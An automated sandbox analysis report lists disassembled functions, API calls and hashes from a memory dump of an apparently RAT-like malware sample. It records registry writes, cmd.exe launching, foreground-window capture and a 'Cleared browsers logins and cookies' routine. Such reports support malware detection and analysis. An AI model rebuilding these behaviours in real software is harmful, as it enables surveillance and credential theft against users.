                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                                                                                                                                • API String ID: 3628047217-1405518554
                                                                                                                                                                                                                                                                                                • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                                                                                                                                                                                                                                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop
                                                                                                                                                                                                                                                                                                • API String ID: 1818849710-27424756
                                                                                                                                                                                                                                                                                                • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                                                                                                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                                                                                                                                                • String ID: TUF
                                                                                                                                                                                                                                                                                                • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                                                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExecuteShell
                                                                                                                                                                                                                                                                                                • String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                                                                                • API String ID: 587946157-3896048727
                                                                                                                                                                                                                                                                                                • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                                                                                                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-1519888992
                                                                                                                                                                                                                                                                                                • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                                                                                                                                                                • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                                                                                                                                • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                                                                                                                                                                                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3360349984-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                                                                                                                                                                                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                                                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1236744412
                                                                                                                                                                                                                                                                                                • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                                                                                                                                                                                                                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                                                                                                • String ID: @CG$exepath$BG
                                                                                                                                                                                                                                                                                                • API String ID: 4119054056-3221201242
                                                                                                                                                                                                                                                                                                • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                                                                                                                                                                                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                                                                                                                • String ID: [ $ ]
                                                                                                                                                                                                                                                                                                • API String ID: 3309952895-93608704
                                                                                                                                                                                                                                                                                                • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                                                                                                                                                                                                                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3604237281-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                                                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                                                                                • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                                                                                • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                                                                                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 737400349-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                                                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                                                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3919263394-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                                                                                                                                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
